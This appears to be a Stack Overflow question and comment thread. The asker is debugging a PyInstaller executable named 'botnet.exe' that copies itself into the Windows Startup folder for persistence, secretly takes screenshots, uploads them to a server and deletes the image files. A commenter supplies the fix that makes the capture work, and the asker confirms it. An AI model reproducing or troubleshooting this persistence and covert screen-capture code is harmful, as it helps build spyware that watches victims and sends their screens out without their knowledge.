# PIL raises .png Key Error after exe file is moved to another directory

Tags: python, python-imaging-library, screenshot, pyautogui, keyerror

I've written a script that after execution, moves (using `shutil.move()`) it's exe file (I created the "onefile" exe using pyinstaller) to another direction (Exe get's deleted from the original directory and moves to another directory) takes a screenshot and saves it somewhere. but the problem is that it won't take the screenshot and raises a ValueError saying `ValueError: unknown file extension: .png` along with a KeyError `KeyError: 'PNG'` While using `copy2` method does not raise these error and the screenshot is captured (But this is not what i want, i want the file to be deleted from it's original directory)

But when the script is run in it's original .py format (not packaged into one exe file), everything works fine, .py file moves to another location and the screenshot is captured.

Why is this happening with the `move` method? What is the solution?

Here is my snippet (`username` is already properly defined):

```html
if not path.exists("C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\botnet.exe".format(username)):
    
    filePy = path.realpath(__file__)
    filepathexe = filePy.replace(".py", ".exe")
    
    shutil.move(filepathexe, "C:\\Users\\{}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup".format(username))  ##shutil.copy2 works fine
    
def takess():
    
    pyautogui.screenshot("C:\\Users\\%s\\scrn.png"%username)
    
    # after capturing the screenshot, it is  uploaded to a server
    
    data = open('C:\\Users\%s\\scrn.png'%username, 'rb')   #data is uploaded to a server
    
    remove('C:\\Users\\%s\\scrn.png'%username) # removing the screenshot png file
```

I believe the part of my code which reads the file as binary and sends it to a server and then deletes it, works fine because the screenshot is never captured. ( as i said executing the original .py file or using `shutil.copt2()` solves the issue)

Comment: interesting question. Could you provice a [mcve]?

Comment: @lucidbrot I updated my post.

Comment: Your program is moving *itself*, while it is running???  WHY???  That seems like a recipe for disaster, I would guess that PIL had not yet loaded all of the modules needed to perform the screenshot at the time of the move, and couldn't do so afterwards because the file was no longer there.  If this is actually necessary for some reason, could you perform the screenshot *before* attempting to move the program?

Comment: Moving the .py file doesn't move any of the standard or installed Python libraries, they're still accessible at their normal location.  But in the case of the .exe, everything used by your program is contained in that one file (that's why it's so much bigger than the .py).

Comment: @jasonharper Thanks, Unfortunately i can not take the screenshot upon execution, because it's function is called later manually. So there are no solutions in my case?

Comment: Move the program, launch the moved program at its new location, let that instance of the program deal with the screenshot?  Take a dummy screenshot before moving the program (to force all the needed modules to be loaded), then delete that screenshot?  Rethink whatever bizarre design decision led you to moving the program in the first place?  (I'm quite surprised that this is allowed at all.)

Comment: @jasonharper I know it is a really bad practice to move a program while it is running, however i need to do so this case. BTW capturing a dummy screen shot and deleting it solved the issue! Apparently it was just as you said : " would guess that PIL had not yet loaded all of the modules needed to perform the screenshot at the time of the move, and couldn't do so afterwards because the file was no longer there." Consider posting your solution as an answer so i can mark it as accepted.